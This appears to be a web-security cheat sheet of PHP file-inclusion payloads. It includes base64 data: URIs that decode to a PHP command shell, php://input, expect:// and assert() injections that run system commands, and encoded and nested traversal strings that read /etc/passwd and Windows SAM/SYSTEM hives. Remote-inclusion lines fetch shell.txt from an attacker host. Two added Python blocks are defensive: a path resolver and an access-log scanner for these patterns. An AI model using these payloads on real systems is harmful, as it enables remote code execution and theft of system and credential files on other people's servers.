File Inclusion

📚 Resources

Payloads

📌 Tips

```bash
# Command Injection via LFI
data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8%2B
data:application/x-httpd-php;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8%2B
data:text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
php://filter/string.strip_tags/resource=data://text/plain,<b>Bold</b><?php shell_exec($_GET["cmd"]); ?>
curl -X POST "http://example.com/index.php?page=php://input" --data "<?php system('id'); ?>"

# Create session file
data://text/plain;base64,PD9waHAgaW5jbHVkZSgnL3Zhci9saWIvcGhwL3Nlc3Npb25zL3Nlc3NfYWJjZGVmJyk7ID8%2B
```

Base64 encoding

```php
data:text/plain;base64,PD9waHAgaW5jbHVkZSgncGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWVuY29kZS9yZXNvdXJjZT1pbmRleC5waHAnKTsgPz4%3D
```

Double Chars Encoding

```bash
# Add %25 in front of the encoding (the %25 decodes to a second % sign)
http://example.com/index.php?page=%252E%252E%252Fetc%252Fpasswd
http://example.com/index.php?page=%252E%252E%252Fetc%252Fpasswd%00
```

Path Truncation

On most PHP installations a filename longer than 4096 bytes is truncated, so any characters beyond that limit are silently discarded.

```bash
# Create a python script to exploit path truncation

http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd
http://example.com/index.php?page=../../../etc/passwd............[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE]
```

From an existing folder

The back-end may be checking that the path starts with an expected folder:

```bash
http://example.com/index.php?page=./../../
http://example.com/index.php?page=./../../../../../etc/passwd
http://example.com/index.php?page=assets/img/../../../../../etc/passwd
http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd
```

LFI via PHP assert

If the following code is used to filter user input:

```php
assert("strpos('$file', '..') === false");
```

Because the user-supplied value is interpolated into the string that assert() evaluates as PHP code, it is possible to close the quotes and execute arbitrary code:

```php
' and die(highlight_file('/etc/passwd')) or '
' and die(system("id")) or '
```

Filter bypass

If the filter removes sequences in a single pass, such as:

```php
str_replace('../', '', $input),
```

the removal can be undone by nesting the sequence inside itself (the characters left after one pass recombine into `../`):

```bash
# bypass
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..././..././etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=///etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
http://example.com/index.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../etc/passwd
```
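The following Python is an added example, not code from the original page: it re-implements the single-pass `str_replace('../', '', $input)` filter above to show why `....//` survives it, and contrasts that with the two checks an include() wrapper should perform instead: canonicalize the joined path and require it to stay under a fixed base directory, or, stricter, accept only a short plain page name from an allowlist. `BASE_DIR` and the page names are hypothetical.

```python
import posixpath
import re

# Python re-implementation of the PHP filter str_replace('../', '', $input).
# Like PHP's str_replace, str.replace makes one pass and never re-scans its
# own output, so "....//" collapses to "../" instead of disappearing.
def naive_strip_traversal(page: str) -> str:
    return page.replace("../", "")


BASE_DIR = "/var/www/pages"  # hypothetical include directory


def resolve_under_base(base_dir: str, page: str):
    """Return the canonical path for `page` if it stays inside base_dir, else None.

    Rejects the shapes shown on this page instead of trying to strip them:
    null bytes, stream wrappers and URLs, backslash separators, absolute paths.
    The check is lexical (posixpath.normpath), so a symlink inside base_dir
    that points outside it still needs a realpath() check at open time.
    """
    if "\0" in page or "%00" in page:
        return None
    if "://" in page or page.lower().startswith("data:"):
        return None
    if "\\" in page or page.startswith("/"):
        return None
    candidate = posixpath.normpath(posixpath.join(base_dir, page))
    prefix = base_dir.rstrip("/") + "/"
    if not candidate.startswith(prefix):
        return None
    return candidate


NAME_RE = re.compile(r"^[a-z0-9_-]{1,32}$")


def page_from_allowlist(name: str, allowed: set, base_dir: str = BASE_DIR):
    """Strictest option: map a short, plain page name onto a known file."""
    if NAME_RE.match(name) and name in allowed:
        return posixpath.join(base_dir, name + ".php")
    return None


if __name__ == "__main__":
    # The "filtered" value still traverses; the resolver rejects it outright.
    print(naive_strip_traversal("....//....//etc/passwd"))        # ../../etc/passwd
    print(resolve_under_base(BASE_DIR, "../../etc/passwd"))        # None
    print(resolve_under_base(BASE_DIR, "about.php"))               # /var/www/pages/about.php
    print(page_from_allowlist("about", {"about", "home"}))         # /var/www/pages/about.php
```

The point of `resolve_under_base` is that it never tries to remove bad sequences; it resolves the path the way the filesystem would and then compares the result with the base directory, so nested `....//`, encoded separators and `assets/img/../../..` prefixes are all handled by the same comparison.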

Linux - Windows

Try replacing / with \

Payloads: C:\ c:%2F \\\etc%2Fpasswd

```bash
# windows files
C:\Windows\win.ini
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SECURITY
C:\Windows\System32\config\SOFTWARE
C:\inetpub\wwwroot\web.config
```

Remote File Inclusion

The RFI vulnerability allows the inclusion of remote files through wrappers such as php://, data:// and others.

In PHP, if the allow_url_include directive in php.ini is set to "Off", these remote wrappers cannot be used with include and RFI cannot be exploited.

```bash
# php.ini
allow_url_include = On ; enables remote wrappers
```

Basic exploit:

```bash
# js file injection
http://example.com/?page=http://evil.com/evil.js
http://example.com/?page=http://evil.com/evil.js%00 # null byte
http://example.com/?page=http%253A%252F%252Fevil%252Ecom%252Fevil%252Ejs # double encoding
```

```bash
# code not interpreted
http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=\\evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
```

phpinfo()

If a PHP application is vulnerable to RFI, it can be made to include a remote PHP file. The server hosting that file must not execute the PHP code itself but serve it as plain text, so that the vulnerable application includes and executes it; a phpinfo() payload then exposes sensitive configuration details.

```bash
echo '<?php phpinfo(); ?>' > phpinfo.php
# or bypass
echo 'php phpinfo(); ?' > phpinfo.php
echo "<php system('whoami'); ?>" > system.php
# Start a web server
python3 -m http.server 80

# Exploit the RFI to fetch the remote phpinfo.php file
curl "$URL/?page=http://exploit.com/phpinfo.php"
```

php://, data://, expect:// wrapper

To exfiltrate the content of a file:

```bash
# data: needs allow_url_include = On; php://filter works without it
data:text/plain;base64,PD9waHAgaW5jbHVkZSgncGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWVuY29kZS9yZXNvdXJjZT1pbmRleC5waHAnKTsgPz4%3D
php://filter/convert.base64-encode/resource=index.php
php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
php://filter/convert.base64-encode|convert.base64-decode/resource=file:///etc/passwd

expect://id | expect://ls
```
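For the defender side of the double-encoding, filter-bypass and wrapper payloads listed on this page, the following Python is an added example (not part of the original page) that scans web-server access logs for an include parameter and reports what remains after the request value has been fully decoded: repeated URL decoding (the double-encoding trick), null bytes, stream wrappers or URL schemes in the value, and `../` that survives backslash normalization. The log lines, the `page` parameter name and the IP addresses are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not captured from a real server); the
# request values follow the payload shapes shown on this page.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=%252E%252E%252Fetc%252Fpasswd HTTP/1.1" 200 1024
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=....//....//etc/passwd HTTP/1.1" 200 1024
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 3000
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?page=http:%252f%252fevil.com%252fshell.txt HTTP/1.1" 500 0
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=evil.js%00 HTTP/1.1" 200 10
10.0.0.3 - - [01/Jan/2024:10:00:06 +0000] "GET /index.php?page=contact HTTP/1.1" 200 700
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) [^"]*"')
# Stream wrappers and URL schemes that have no business in a page= parameter.
WRAPPER_RE = re.compile(r"^(?:(php|expect|file|phar|zip|glob|https?|ftps?)://|(data):)", re.I)
PARAM = "page"  # assumed name of the include parameter


def decode_fully(value, max_rounds=5):
    """URL-decode until the value stops changing; return (decoded, rounds)."""
    rounds = 0
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def raw_param(uri, name):
    """Return the still-encoded value of `name` from the URI query, or None."""
    if "?" not in uri:
        return None
    for pair in uri.split("?", 1)[1].split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return value
    return None


def classify(raw_value):
    """Return (decoded value, list of indicators) for one parameter value."""
    decoded, rounds = decode_fully(raw_value)
    normalized = decoded.replace("\\", "/")  # \..\ is traversal on Windows hosts
    reasons = []
    if "\x00" in decoded:
        reasons.append("null-byte")
    if rounds >= 2:  # a single %-decode is normal; a second one is the %25 trick
        reasons.append("double-encoding")
    m = WRAPPER_RE.match(normalized)
    if m:
        reasons.append("wrapper:" + (m.group(1) or m.group(2)).lower())
    if "../" in normalized:  # substring check catches ....// and ..%2F forms too
        reasons.append("traversal")
    return decoded, reasons


def scan_log(text):
    """Return one finding per log line whose include parameter carries an indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        raw_value = raw_param(m.group("uri"), PARAM)
        if raw_value is None:
            continue
        decoded, reasons = classify(raw_value)
        if reasons:
            findings.append({"ip": m.group("ip"), "page": raw_value,
                             "decoded": decoded, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], ",".join(f["reasons"]), repr(f["decoded"]))
```

Decoding until the value is stable matters because a WAF or log search that decodes once sees `%2E%2E%2F`, not `../`; reporting the number of decode rounds is itself an indicator, since legitimate clients encode a parameter once. The wrapper match runs on the decoded value, which is also where `http:%252f%252f` becomes a visible remote URL.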